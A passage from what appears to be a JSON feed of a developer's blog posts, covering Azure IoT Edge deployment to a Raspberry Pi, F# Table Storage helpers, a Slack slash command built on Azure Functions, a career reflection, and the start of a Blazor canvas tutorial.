downloader onto the Raspberry Pi. As I mentioned in the post on how the downloader works I do the local development using Docker and ideally, I want to run Docker on the Pi. Running Docker on a Pi is straight forward, you just install it from the Linux package manager like any other piece of software, the only difference is that your base image will need to be an ARM32 image, and thankfully Microsoft ships this for us (for reference I use mcr.microsoft.com/dotnet/core/runtime:2.2.5-stretch-slim-arm32v7 as my base image).\nGetting Containers onto the Pi I’ve got my Dockerfile, I can make an Image but how do I get that onto the Pi and then run a Container?\nDevOps! 🎉\nMy initial idea was to deploy an Azure Pipeline agent on to the Raspberry Pi and then add that to my agent pool in Azure Pipelines. I know this is possible, I’ve seen Damian Brady do it, but it turns out that he was using a custom compiled agent and it’s not really a supported. So that’s not really ideal, I don’t want a solution that I have to constantly ensure is working, I just want something that works.\nAnd this is what led me to Azure IoT Edge.\nIntroducing IoT Edge IoT Edge is part of the Azure IoT suite and it’s designed for deploying reusable modules onto IoT devices, also known as “Edge Devices”.\nThe way IoT Edge works is you run an agent on the device that communicates with IoT Hub. In IoT Hub you create a deployment against a device in which you specify the modules, which are Docker images, that you want to run on the device. IoT Edge checks for deployments, when it finds one it pulls it down, grabs the Docker images and runs the containers. Here is a really good starting point to understand IoT Edge’s architecture and how it fits into a solution. I’m not going to cover all of that in detail, instead I’m going to focus on the pieces that you need to understand when it comes do using IoT Edge for deployments.\nGetting the Solution Ready for DevOps If you’re like me and started building a project before learning about all the things you’d need to use you may need to retrofit IoT Edge into it. The IoT Edge docs have a good getting started guide that I’d encourage you to read if you’re just getting started, but since I didn’t know about IoT Edge until I had already built it let’s look at what is needed to do to IoT Edge-ify a project.\nDocker Images The really nice thing about how IoT Edge works is that it uses Docker as the delivery mechanism for the applications you want to run on the device, the only stipulation is that the Image uses a base of ARM32 (or ARM64 if that’s what your device runs). So this means that we’ll need to create an additional Dockerfile that will be able to run on our Raspberry Pi.\n1 2 3 4 5 6 FROM mcr.microsoft.com/dotnet/core/runtime:2.2.5-stretch-slim-arm32v7 WORKDIR /app COPY ./bin/Release/netcoreapp2.2/publish ./ ENTRYPOINT ["dotnet", "Sunshine.Downloader.dll"] Source on GitHub\nOh, that’s not really that different to how we do local dev, in fact it’s actually a really basic Dockerfile, all it does is copy the build artifacts in (we’re not using multi-stage Dockerfiles as I discussed in the local dev post).\nIoT Edge Modules Before we talk about how to do a deployment with IoT Edge I want to talk about IoT Edge Modules. A Module is an application that is running on your device and is defined in a JSON file. A device may have multiple Modules deployed onto it, but a Module is a single application.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 { "$schema-version": "0.0.1", "description": "", "image": { "repository": "${CONTAINER_REGISTRY_SERVER}/sunshine-downloader", "tag": { "version": "${BUILD_BUILDID}", "platforms": { "amd64": "./Dockerfile.amd64", "amd64.debug": "./Dockerfile.amd64.debug", "arm32v7": "./Dockerfile.arm32v7" } }, "buildOptions": [], "contextPath": "./" }, "language": "csharp" } Source on GitHub\nHere’s the JSON for my Sunshine Downloader Module. There’s a bit of metadata in there (description, language) with the important part of it being the image. In here we define how we’re going to build our Image and what container registry is it going to be published to.\nFirst off, the registry. This can be published to a private registry, such as your own Azure Container Registry (this is what I use) or to a public registry like Docker Hub (although I wouldn’t advise that). You’ll need to make sure that the registry can be accessed by the device you’re deploying to, so they need to be on the same local network, vpn or it needs to be internet addressable.\nNext, you define the tag for the Image, and the Dockerfiles that will be used to create them. I’m generating 3 Images, two AMD64 images (one which contains the debugging symbols) and my ARM32 image. It’s generally good practice to name the tags relative to the architecture they represent, but it’s not mandatory. We will need the names soon, so make sure they aren’t too obscure.\nFinally, we can give some arguments to the docker build command that will ultimately be executed here in the buildOptions.\nSomething you might’ve noticed in the JSON above is that I have a few ${...} things. These are references to environment variables that will be available when I’m creating the deployment. The CONTAINER_REGISTRY_SERVER will need to be the URL of the registry you’re using and I’m passing BUILD_BUILDID from the Azure Pipeline Build Variables, but that can be anything you want to tag the version.\nOne thing I did find that was important with Modules is that you need to name the file module.json and have it sitting alongside the Dockerfiles that you are using. Because of this I ended up placing all the files in the same folder as the source code for the downloader.\nDeployments with IoT Edge With our Module defined we can go ahead and create a deployment with IoT Edge. For this we’ll need to create a deployment.template.json file, which is our deployment template that will be used to create the deployment for our different module platforms.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 { "$schema-template": "1.0.0", "modulesContent": { "$edgeAgent": { "properties.desired": { "schemaVersion": "1.0", "runtime": { "type": "docker", "settings": { "minDockerVersion": "v1.25", "loggingOptions": "", "registryCredentials": { "YourACR": { "username": "${CONTAINER_REGISTRY_USERNAME}", "password": "${CONTAINER_REGISTRY_PASSWORD}", "address": "${CONTAINER_REGISTRY_SERVER}" } } } }, "systemModules": { "edgeAgent": { "type": "docker", "settings": { "image": "mcr.microsoft.com/azureiotedge-agent:1.0.7", "createOptions": "" } }, "edgeHub": { "type": "docker", "status": "running", "restartPolicy": "always", "settings": { "image": "mcr.microsoft.com/azureiotedge-hub:1.0.7", "createOptions": { "HostConfig": { "PortBindings": { "5671/tcp": [{ "HostPort": "5671" }], "8883/tcp ": [{ "HostPort": "8883" }], "443/tcp": [{ "HostPort": "443" }] } } } } } }, "modules": { "SunshineDownloader": { "version": "1.0", "type": "docker", "status": "running", "restartPolicy": "always", "settings": { "image": "${MODULES.Sunshine.Downloader}", "createOptions": {} } } } } }, "$edgeHub": { "properties.desired": { "schemaVersion": "1.0", "routes": { "route": "FROM /* INTO $upstream" }, "storeAndForwardConfiguration": { "timeToLiveSecs": 7200 } } } } } Source on GitHub\nThis file is a bit large so it’s time to break it down and learn what we need to know about it.\nIt starts off defining some information about the agent that’s running on our device in the $edgeAgent node. You’ll notice in there are the credentials for your container registry (ACR or other), like the module.json file, these come from environment variables that you would set before generating the deployment from the template.\nNext up we define the systemModules which tells the deployed Edge agent about the Edge agent to run, really what this means is that we can configure the agent and upgrade it just by creating a deployment. The agent is a Docker image (found here) as is the Edge Hub (found here). I’m using release 1.0.7 which was the stable at the time I build Sunshine, but there may be a newer version that you can grab. Both of these pieces are important as the Agent is the container that talks to IoT Hub, reports statuses, etc. whereas the Hub is the bridge between your application and IoT Hub.\nWithin the modules node you define the modules that you wish to install into your device. This is a JSON object where you can define as many as you want, and the name that you give it is the name that will appear if you do a docker ps on your device (I’ve used SunshineDownloader) so it’ll need to conform to Docker container naming conventions. The two important parts of the module definition that you’ll need to set are the Image variable and any createOptions that your Container will need.\nFor the image property I have ${MODULES.Sunshine.Downloader}, but what does that represent and how does it even work? This variable is made up for two parts, the first, MODULES is the MODULES_PATH that the IoT Edge tooling looks for. By default it will look for a folder called modules relative to the directory that the template is in (source reference) but can be overridden using a .env file. In fact, this is what I do since my source code is in the src folder. The rest of the variable is the folder within the MODULES_PATH that your module resides in, leading up to module.json.\nThe final node within our JSON is $edgeHub which is some instructions for the IoT Hub module that allows us to control information about it. I’m using this to ensure that messages from my module land in IoT Hub using the route. Defining a route of FROM /* INTO $upstream basically says “every message from the device goes into the primary IoT Hub endpoint”. This can be used to configure pre-routing of the messages, but I route messages within IoT Hub instead.\nRunning a Deployment Our deployment template is created, our module is defined and our images are ready to be built, all that is left is to, well, deploy!\nTo do a deployment we will use the IoT Edge Dev Tool, an Open Source Python application for working with IoT Edge.\nCreating an Image Because my deployment.template.json file lives in the .build folder (I like to keep my files for different tasks out of the repository root) we’ll navigate there. Now we can run iotedgedev build and it’ll build the Image for us. By default it’ll use the amd64 architecture and “push” to your local Docker registry, but we want to deploy to our Pi so we’ll need to edit the .env and set the IOTHUB_CONNECTION_STRING and DEVICE_CONNECTION_STRING entries to the appropriate pieces from Azure (note: I didn’t check those into source control!) and you’ll need to pass the --platform argument with arm32v7 to build that module image.\nOnce the build has completed you’ll find a new deployment file named deployment.<platform>.json (so deployment.arm32v7.json) which is what we’ll use for the deployment to the device.\nPublishing an Image With our Image built we can push it to our container registry, again to support that you need to set the CONTAINER_REGISTRY_USERNAME, CONTAINER_REGISTRY_PASSWORD and CONTAINER_REGISTRY_SERVER environment variables to ACR (or any other container registry you want to push to) prior to doing a build, as they are added to the deployment.<platform>.json file. Then execute the iotedgedev push command to push your image to the registry. This command will want to do a build, so pass --no-build if you want to skip Image creation.\nDeploying an Image For us to deploy the image we won’t use the iotedgedev tool, instead we’ll use the Azure CLI and specifically the IoT Extensions, so grab the Azure CLI (I use the Docker distribution of it), log in to your account and install the IoT Extension.\nWe’re going to use the edge deployment create command to create a deployment in IoT Hub for our IoT Edge device using the deployment template we specified above.\n1 $> az iot edge deployment create --deployment-id deployment-01 --hub-name <iot hub name in Azure> --content <path to deployment JSON file> --target-condition deviceId='<name of IoT device in Azure>' --priority 0 Assuming everything went successfully you will now see a deployment listed in Azure against your IoT Edge device and shortly the device will pull the Image and start a Container from it!\nConclusion Phew, that was a bit of a complex blog as there’s a lot of little pieces that come into play when you start looking to deploy to an IoT device. Admittedly, I made things a bit harder on myself because I went down the route of creating the application before deciding to use IoT Edge for deployments. If I was to start again I would stick more with the guidance outlines on the docs site, there’s quite a good step-by-step guide starting here that goes through the process.\nWe start with defining our Module, which is the thing that we’ll run on the IoT device as a Docker Container, next we create a deployment.template.json file which is a generic template that describes how to deploy to a platform and finally we can use the Azure CLI to create a deployment for our device to pick up.\nNext time we’ll move away from executing the commands ourselves and control it all via Azure Pipelines.\n", "id": "2019-07-16-home-grown-iot-devops" }, { "title": "Using FSharp with Table Storage and Azure Functions", "url": "https://www.aaron-powell.com/posts/2019-07-12-using-fsharp-with-table-storage-and-azure-functions/", "date": "Fri, 12 Jul 2019 15:02:01 +1000", "tags": [ "fsharp", "azure-functions", "serverless" ], "description": "A quick look at how to use the FSharp.Azure.Storage package in Azure Functions", "content": "I’ve been doing a lot of work recently with Azure Functions in which I use Table Storage as the backend for it. This led me to start using the FSharp.Azure.Storage NuGet package which gives a nicer API for Table Storage (and also happens to be written by a former colleague of mine).\nBut there’s a catch, FSharp.Azure.Storage is designed to work with the CloudTableClient which you would normally get like so:\n1 2 3 4 5 6 7 open Microsoft.WindowsAzure.Storage open Microsoft.WindowsAzure.Storage.Table let account = CloudStorageAccount.Parse "UseDevelopmentStorage=true;" //Or your connection string here let tableClient = account.CreateCloudTableClient() let inGameTable game = inTable tableClient "Games" game But when we’re using an Azure Function we’re likely doing a binding in our Function parameter, like this:\n1 2 3 4 [<FunctionName("Some_Function")>] let someFunction ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "some-function")>] req: HttpRequest) ([<Table("MyData")>] dataTable: CloudTable) = // do stuff Notice that here we’ll receive a CloudTable, which has already been created from the CloudTableClient. This is because Azure Functions takes care of the creation and “connection pooling” (for lack of a better description) so that we don’t need to do it ourselves as the Functions scale. We also need the name of the table that we’re working with, again we don’t need to worry about that in our Function, since we already have the CloudTable.\nThankfully, we can go from a CloudTable back to the CloudTableClient and get the name of the table at the same time. To do this I’ve created some new functions in my F# codebase:\n1 2 3 4 5 6 7 8 9 10 11 12 module azureTableUtils open FSharp.Azure.Storage.Table open Microsoft.WindowsAzure.Storage.Table let fromTableToClientAsync (table: CloudTable) q = fromTableAsync table.ServiceClient table.Name q let fromTableToClient (table: CloudTable) q = fromTable table.ServiceClient table.Name q let inTableToClientAsync (table: CloudTable) o = inTableAsync table.ServiceClient table.Name o let inTableToClient (table: CloudTable) o = inTable table.ServiceClient table.Name o let inTableToClientAsBatch (table: CloudTable) o = inTableAsBatch table.ServiceClient table.Name o let inTableToClientAsBatchAsync (table: CloudTable) o = inTableAsBatchAsync table.ServiceClient table.Name o From the CloudTable you can access the ServiceClient to get the CloudTableClient and Name gives you the name!\nNow we can use it in our Azure Function like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [<FunctionName("Some_Function")>] let someFunction ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "some-function")>] req: HttpRequest) ([<Table("MyData")>] dataTable: CloudTable) = async { let! data = Query.all<MyData> |> fromTableToClientAsync dataTable let! data |> Seq.map (fun (d, _) -> { d with Value = "Updated" }) |> Replace |> autobatch |> List.map (inTableToClientBatch dataTable) |> Async.Parallel return OkResult() :> IActionResult } |> Async.StartAsTask Feel free to use those functions in your own applications. You will have to explcitly type the table argument as CloudTable as the F# type inference isn’t able to pick up that that’s what it is otherwise.\nHappy F#‘ing!\n", "id": "2019-07-12-using-fsharp-with-table-storage-and-azure-functions" }, { "title": "Creating Slack Commands With Azure Functions", "url": "https://www.aaron-powell.com/posts/2019-07-12-creating-slack-commands-with-azure-functions/", "date": "Fri, 12 Jul 2019 09:44:37 +1000", "tags": [ "fsharp", "azure-functions", "serverless" ], "description": "A guide to creating a Slack 'slash command' using Azure Functions as the handler.", "content": "I’ve recently been doing some upgrades to the infrastructure of DDD Sydney, primarily around migrating the API from the Azure Functions v1 stack to v2 (it’s actually picking up a change from last year that I put on hold due to a bug in the v2 preview).\nOnce I got the core functionality completed I decided it was time to tackle something that I’d always wanted, a way that we could view the session information and perform some tasks in our Slack channel.\nExtending Slack There are a few different ways that you can extend Slack, and since my needs are simple I decided to use the Slash Command so that we can type /sessions 2019 and get a list of all the sessions that are submitted for a particular year.\nThe first step is to create a new application in Slack against the workspace you want:\nOur app is ready for us to start creating commands for, but before we create the command we’re going to need a URL for it to call when invoked, and for that we’ll use Azure Functions.\nCreating our Function I use VS Code to create the Function (but choose whichever editor you want) and I then modified the generated project so I can use F# (see this post for what you need to do).\nWith that all done it’s time to create a Function, let’s create the Function that lists the approved sessions! Quick note: we sync the sessions from Sessionize but mark them as “unapproved”, meaning that we do a quick review of them to ensure they don’t violate our Code of Conduct, before approving them. Only approved sessions can be voted on.\nWhen a slash command is executed it sends a HTTP POST to the endpoint you provide, so we’ll need to use the HTTP binding.\n1 2 3 4 5 6 7 8 9 10 11 module SlackCommands open Microsoft.Azure.WebJobs open Microsoft.Azure.WebJobs.Extensions.Http open Microsoft.AspNetCore.Http [<FunctionName("Slack_Approved_Sessions")>] let approvedSessionsCommand ([<HttpTrigger(AuthorizationLevel.Function, "post", Route = "v2/Slack-ApprovedSession")>] req: HttpRequest) ([<Table("Session", Connection = "EventStorage")>] sessionsTable) ([<Table("Presenter", Connection = "EventStorage")>] presentersTable) = ignore() Let’s break it down, we start off creating the F# function that will be our Azure Function, named approvedSessionsCommand. It’s decorated with the FunctionName attribute so that the Functions Host knows about it. Finally, we provide it with some argument with bindings, for this one we’ll need three bindings, the first is the HttpTrigger attribute and then the two Table bindings for us to access Table Storage where the data is kept. For the HttpTrigger it’s access level is defined as AuthorizationLevel.Function, meaning that there’s a key needing to be provided to access it (basic security), it’s listening for "post" requests only and the route is v2/Slack-ApprovedSessions (v2 because this is the second generation of the API for DDD Sydney).\nHandling the Incoming Message When a slash command is typed you can provide a message to it and this message is passed to the Function being called. I was to use this in our purpose to get the year out, so the command can be used every year without change, invoking it like /sessions 2019.\nTo get this text we need to grab it out of the incoming message body, unfortunately, this isn’t a JSON payload it’s a standard form post, so no nice clean object for us. 🙁\nInstead we’ll need to get it out of the body of the HttpRequest:\n1 2 3 4 5 6 7 [<FunctionName("Slack_Approved_Sessions")>] let approvedSessionsCommand ([<HttpTrigger(AuthorizationLevel.Function, "post", Route = "v2/Slack-ApprovedSession")>] req: HttpRequest) ([<Table("Session", Connection = "EventStorage")>] sessionsTable) ([<Table("Presenter", Connection = "EventStorage")>] presentersTable) = let year = req.Form.["text"].[0] ignore() The text property of the form contains what was entered by the user (minus the slash command) so it’s a good idea to do some validation against it to make sure it conforms to the structure you want and reject it if it doesn’t.\nGetting Data I’ll only quickly go over how this particular function gets the data as it’s specific to my scenario and yours may be different. What’s important to note is that this is just an Azure Function so you can do whatever you need to do.\nThe data for our sessions is stored in Table Storage across two tables, the Session table, which contains the session metadata and the Presenter table which contains the presenters for the session since a session may have multiple presenters (also we don’t de-dup the presenter table so if you submit multiple talks we have multiple records for you). These two tables are “linked” using the ID of the session.\nFor accessing data I use the FSharp.Azure.Storage NuGet package, which gives a nicer F# API for working with Table Storage.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [<FunctionName("Slack_Approved_Sessions")>] let approvedSessionsCommand ([<HttpTrigger(AuthorizationLevel.Function, "post", Route = "v2/Slack-ApprovedSession")>] req: HttpRequest) ([<Table("Session", Connection = "EventStorage")>] sessionsTable) ([<Table("Presenter", Connection = "EventStorage")>] presentersTable) = async { let year = req.Form.["text"].[0] let! sessions = Query.all<SessionV2> |> Query.where <@ fun s _ -> s.EventYear = year && s.Status = "Approved" @> |> fromTableToClientAsync sessionsTable let! presenters = Query.all<Presenter> |> Query.where<@ fun p _ -> p.EventYear = year @> |> fromTableToClientAsync presentersTable return ignore() } |> Async.StartAsTask We use Query.all<T> to get the data back and then Query.where to filter on the year provided and (in the case of Sessions) the status of Approved. It’s not super optimised since we get back all presenters, even if they aren’t related to an approved session, but we’re talking ~100 records so the performance isn’t really a worry.\nPreparing Our Response With our data in hand it’s time to send a response back to Slack. Slack supports a lot of ways to create messages but when you are using Layout Blocks you’re limited to 50 blocks, and we’ll have more talks than that so it’s not ideal.\nInstead, we’ll keep it simple and just use a plain text response with embedded mrkdwn. Note: Slack doesn’t use Markdown, it uses its own variant called mrkdwn. There are some subtle differences and limitations on what formatting you can apply.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 let sessionToViewMessage session presenters = presenters |> Seq.map (fun p -> p.FullName) |> String.concat ", " |> sprintf "(%s) _%s_ by *%s*" session.SessionizeId session.Title [<FunctionName("Slack_Approved_Sessions")>] let approvedSessionsCommand ([<HttpTrigger(AuthorizationLevel.Function, "post", Route = "v2/Slack-ApprovedSession")>] req: HttpRequest) ([<Table("Session", Connection = "EventStorage")>] sessionsTable) ([<Table("Presenter", Connection = "EventStorage")>] presentersTable) = async { let year = req.Form.["text"].[0] let! sessions = Query.all<SessionV2> |> Query.where <@ fun s _ -> s.EventYear = year && s.Status = "Approved" @> |> fromTableToClientAsync sessionsTable let! presenters = Query.all<Presenter> |> Query.where<@ fun p _ -> p.EventYear = year @> |> fromTableToClientAsync presentersTable let resultSessions = sessions |> Seq.map(fun (s, _) -> presenters |> Seq.filter (fun (p, _) -> p.TalkId = s.SessionizeId) |> Seq.map (fun (p, _) -> p) |> sessionToViewMessage s) match Seq.length resultSessions with | 0 -> return OkObjectResult(":boom: There are no approved sessions") :> IActionResult | _ -> return OkObjectResult(resultSessions |> String.concat "\\r\\n") :> IActionResult } |> Async.StartAsTask I’ve introduced a function call sessionToViewMessage which takes a session and its presenters and generates a line string like this:\n(12345) _My Awesome Session_ by *Aaron Powell* The result of this is an seq<string> which is concatted together with \\r\\n for a new line and returned as an OkObjectResult, to represent a HTTP 200 OK response to Slack.\nNow that your Function is complete, deploy it to Azure (use a Pipeline, use the VS Code Tooling, etc.) and we’re ready to plug it into Slack.\nWiring Up Our Slash Command With our Function deployed it’s time to plug it into our slash command. Before getting started, ensure you have the URL of your Azure Function (you can get it via the portal) as we’ll need it to set up the slash command.\nNow that you have your URL head over to Slack App we created earlier and navigate to Features -> Slash Commands -> Create New Command and fill out the form.\nWhen it’s done hit Save.\nFinally, navigate back to Basic Information and ensure that your application has been installed into your workspace:\nNow your slash command will appear for everyone to use!\n🎉 You now have a slash command powered by Azure Functions!\nConclusion Slash Commands in Slack is a really easy way for you to integrate some custom functionality in your business into your standard tooling. For us at DDD Sydney it means that we can quickly do the admin tasks that we need to do for the conference without having to dig into the Azure portal.\nAnd Azure Functions made this really straight forward, from a simple HTTP Trigger binding to accept the incoming POST, to the pre-parsed form body as a key/value pair and having Functions provide auto-wiring of the other Azure services we need to integrate with. You can check out all the slash command we have in the API on our GitHub API project.\nHopefully this has given you some insights into how to do your own ChatOps with Slack and Azure Functions.\n", "id": "2019-07-12-creating-slack-commands-with-azure-functions" }, { "title": "6 Months at Microsoft", "url": "https://www.aaron-powell.com/posts/2019-07-08-6-months-at-microsoft/", "date": "Mon, 08 Jul 2019 14:21:49 +1000", "tags": [ "career", "microsoft" ], "description": "Has it already been 6 months? Or has it only been 6 months?", "content": "I started off 2019 with my 2018 summary where I announced that I had left Readify and joined Microsoft.\nWell, today is 6 months since I started and I wanted to take some time to reflect on my first 6 months at Microsoft and the first 6 months in a Developer Relations role, aka DevRel.\nSo, like, what do you do for a job? This is probably the most common question I get asked, well, I’ve always been asked it just now it’s been a bit harder to define. It’s especially tricky when talking to someone outside of the tech industry because “DevRel” doesn’t make sense to people who aren’t in tech and even then it’s no guarantee! 🤣\n6 months ago I really didn’t have a clue what my job would entail and part of that is because everyone’s approach to the job is different, some people travel the world presenting at conferences, some people live stream on twitch, some people do podcasts, some people write. So, what do I do?\nI produce content.\nThis is how I look at my job; my job is to produce content. Now, this takes different forms for different people but for me, I do a lot of my content production in the form of blogs. But blogging isn’t the finality of content production, once I’ve written a blog I might extract a talk out of it to submit to some events, turn it into official documentation, propose it to user groups, present it internally or appear on a pod/vod-cast.\nBecause of this, I spent a lot more time writing code than I have for a very long time, the bulk of my days are spent writing code. After all, if I didn’t write code then I’d have nothing to produce content on! In fact, I’ve created 30 posts already this year which is the most blogging I’ve done since 2013 (34 posts) but still shy of my busiest year of 2010 (with 80 posts, but I’m not sure if they are date-tagged correctly from the many years of rebuilding my site).\nI really enjoy writing, I’ve been blogging for over a decade now and the fact that it’s my job to do it makes me happy. I don’t do much in the way of conferences, I don’t really subscribe to that style of DevRel. Sure, I do conferences, but spending every other week on an aircraft is exhausting, so I’m more select on the travel I do.\nLearning new things As I’m always looking for new ideas for content and to engage with different audiences I’ve been able to spend a lot of time picking up new technologies. I did my first bit of Golang, learnt WebAssembly and built an IoT project in F# (which I still have more content to come!).\nBeing at Microsoft Microsoft is a facinating organisation to work for as there’s simply nothing else on the same scale to compare it to. Having come from a large Microsoft partner I had some thoughts on what it’d be like to work with Microsoft tools, but in reality, it’s nothing like that (I’ve joked that Readify is more Microsoft than Microsoft).\nAnd being in a completely distributed team is very much a change for me. I’m still quite in the mindset of “I go to the office to work” but in since my office is my home office so I get up of a morning and my main task for the day is done! Quite often I’ll head into the Microsoft Reactor to work rather than working at home, partially because when my kids aren’t in daycare it’s a bit distracting being home with them and partially to get me out of the house.\nBut because we’re distributed we do everything online; we chat through Slack for pretty much everything, we organise video calls at a random time to inconvenience different groups of people each time (there’s no single time that works for everyone!) and ever so occasionally an email is sent. This is a double-edged sword though as I found myself early on checking Slack on Saturday’s (overlap with the US Friday) for example. This isn’t the best, you need to disconnect from work a bit, and over the last few months, I’ve got better at the weekend being non-work time (my laptop rarely gets touched between Friday evening and Monday morning).\nIt’s fun Honestly, I’m having so much fun, probably the most fun I’ve had at work for a while now. I don’t say that intending to throw shade at Readify or anything, but I’d forgotten what it was like to be writing code all the time, building experiments, that sort of stuff.\nHere’s to another 6 months.\nOh, and most importantly… I survived my first reorg! 🤣\n", "id": "2019-07-08-6-months-at-microsoft" }, { "title": "Creating DEV's offline page using Blazor", "url": "https://www.aaron-powell.com/posts/2019-07-08-creating-devto-offline-page-with-blazor/", "date": "Mon, 08 Jul 2019 14:12:11 +1000", "tags": [ "wasm", "dotnet" ], "description": "Let's build something with Blazor!", "content": "This post was originally published under my DEV.to account.\nI came across a fun post from Ali Spittel on Creating DEV’s offline page (their offline page is here).\nGiven that I’ve done some experiments in the past with WebAssembly I decided to have a crack at my own implementation in WebAssembly, in particular with Blazor.\nGetting Started Caveat: Blazor is a platform for building client side web applications using the .NET stack and specifically the C# language. It’s highly experimental so there’s a chance things will change from what it exists at the time of writing (I’m using build 3.0.0-preview6.19307.2).\nFirst up you’ll need to follow the setup guide for Blazor and once that’s done create a new project in your favorite editor (I used VS Code).\nI’ve then deleted all the boilerplate code from the Pages and Shared folder (except any _Imports.razor files), Bootstrap from the css folder and sample-data. Now we have a completely empty Blazor project.\nCreating Our Layout First thing we’ll need to do is create the Layout file. Blazor, like ASP.NET MVC, uses a Layout file as the base template for all pages (well, all pages that use that Layout, you can have multiple layouts). So, create a new file in Shared called MainLayout.razor and we’ll define it. Given that we want it to be full screen it’ll be pretty simple:\n@inherits LayoutComponentBase @Body This file inherits the Blazor-provided base class for layouts, LayoutComponentBase which gives us access to the @Body property which allows us to place the page contents within any HTML we want. We don’t need anything around it, so we just put @Body in the page.\nCreating Our Offline Page Time to make the offline page, we’ll start by creating a new file in the Pages folder, let’s call it Offline.html:\n1 2 3 @page "/" <h3>Offline</h3> This is our starting point, first we have the @page directive which tells Blazor that this is a page we can navigate to and the URL it’ll respond to is "/". We’ve got some placeholder HTML in there that we’ll replace next.\nStarting the Canvas The offline page is essentially a large canvas that we can draw on, and we’ll need to create that, let’s update Offline.razor with a canvas element:\n1 2 3 @page "/" <canvas></canvas> Setting the Canvas Size We need to set the size of the canvas to be full screen and right now it’s 0x0, not ideal. Ideally, we want to get the innerWidth and innerHeight of the browser, and to do that we’ll need to use the JavaScript interop from Blazor.\nWe’ll quickly make a new JavaScript file to interop with (call it helper.js and put it in wwwroot, also update index.html in wwwroot to reference it):\n1 2 3 window.getWindowSize = () => { return { height: window.innerHeight, width: window.innerWidth }; }; Next we’ll create a C# struct to represent that data (I added a file called WindowSize.cs into the project root):\n1 2 3 4 5 6 7 8 namespace Blazor.DevToOffline { public struct WindowSize { public long Height { get; set; } public long Width { get; set; } } } Lastly, we need to use that in our Blazor component:\n@page "/" @inject IJSRuntime JsRuntime <canvas height="@windowSize.Height" width="@windowSize.Width"></canvas> @code { WindowSize windowSize; protected override async Task OnInitAsync() { windowSize = await JsRuntime.InvokeAsync<WindowSize>("getWindowSize"); } } That’s a bit of code added so let’s break it down.\n@inject IJSRuntime JsRuntime Here we use Dependency Injection to inject the IJSRuntime as a property called JsRuntime on our component.\n<canvas height="@windowSize.Height" width="@windowSize.Width"></canvas> Next, we’ll set the height and width properties of the <canvas> element to the value of fields off an instance of our struct, an instance named windowSize. Note the @ prefix, this tells the compiler that this is referring to a C# variable, not a static string.\n1 2 3 4 5 6 7 8 @code { WindowSize windowSize; protected override async Task OnInitAsync() { windowSize = await JsRuntime.InvokeAsync<WindowSize>("getWindowSize"); } } Now we’ve added a code block into our component. It contains the variable windowSize (which is uninitialized, but it’s a struct so it has a default value) and then we override a Lifecycle method, OnInitAsync, in which we call out to JavaScript to get the window size and assign it to our local variable.\nCongratulations, you now have a full screen canvas! 🎉\nWiring Up Events We may have our canvas appearing but it doesn’t do anything yet, so let’s get cracking on that by adding some event handlers:\n@page "/" @inject IJSRuntime JsRuntime <canvas height="@windowSize.Height" width="@windowSize.Width" @onmousedown="@StartPaint" @onmousemove="@Paint" @onmouseup="@StopPaint" @onmouseout="@StopPaint" /> @code { WindowSize windowSize; protected override async Task OnInitAsync() { windowSize = await JsRuntime.InvokeAsync<WindowSize>("getWindowSize"); } private void StartPaint(UIMouseEventArgs e) { } private async Task Paint(UIMouseEventArgs e) { } private void StopPaint(UIMouseEventArgs e) { } } When you’re binding events in Blazor you need to prefix the event name with @, like @onmousedown, and then provide it the name of the function to invoke when the event happens, e.g. @StartPaint. The signature of these functions are to either return a void or Task, depending on whether it’s asynchronous or not. The argument to the function will need to be the appropriate type of event arguments, mapping to the DOM equivalent (UIMouseEventArgs, UIKeyboardEventArgs, etc.).\nNote: If you’re comparing this to the JavaScript reference implementation, you’ll notice I’m not using the touch events. This is because, in my experiments today, there is a bug with binding touch events in Blazor. Remember, this is preview!\nGetting the Canvas Context Note: I’m going to talk about how to setup interactions with <canvas> from Blazor, but in a real application you’d more likely want to use BlazorExtensions/Canvas than roll-you-own.\nSince we’ll need to work with the 2D context of the canvas we’re going to need access to that. But here’s the thing, that’s a JavaScript API and we’re in C#/WebAssembly, this will be a bit interesting.\nUltimately, we’re going to have to this in JavaScript and rely on the JavaScript interop feature of Blazor, so there’s no escaping writing some JavaScript still!\nLet’s write a little JavaScript module to give us an API to work with:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 (window => { let canvasContextCache = {}; let getContext = canvas => { if (!canvasContextCache[canvas]) { canvasContextCache[canvas] = canvas.getContext("2d"); } return canvasContextCache[canvas]; }; window.__blazorCanvasInterop = { drawLine: (canvas, sX, sY, eX, eY) => { let context = getContext(canvas); context.lineJoin = "round"; context.lineWidth = 5; context.beginPath(); context.moveTo(eX, eY); context.lineTo(sX, sY); context.closePath(); context.stroke(); }, setContextPropertyValue: (canvas, propertyName, propertyValue) => { let context = getContext(canvas); context[propertyName] = propertyValue; } }; })(window); I’ve done this with a closure scope created in an anonymous-self-executing-function so that the canvasContextCache, which I use to avoid constantly getting the context, isn’t exposed.\nThe module provides us two functions, the first is to draw a line on the canvas between two points (we’ll need that for the doodling!) and the second updates a property of the context (we’ll need that to change colours!).\nYou might also notice that I don’t ever call document.getElementById, I just somehow “magically” get the canvas. This can be achieves by capturing a component reference in C# and passing that reference around.\nBut this is still all JavaScript, what do we do in C#? Well, we create a C# wrapper class!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 public class Canvas2DContext { private readonly IJSRuntime jsRuntime; private readonly ElementRef canvasRef; public Canvas2DContext(IJSRuntime jsRuntime, ElementRef canvasRef) { this.jsRuntime = jsRuntime; this.canvasRef = canvasRef; } public async Task DrawLine(long startX, long startY, long endX, long endY) { await jsRuntime.InvokeAsync<object>("__blazorCanvasInterop.drawLine", canvasRef, startX, startY, endX, endY); } public async Task SetStrokeStyleAsync(string strokeStyle) { await 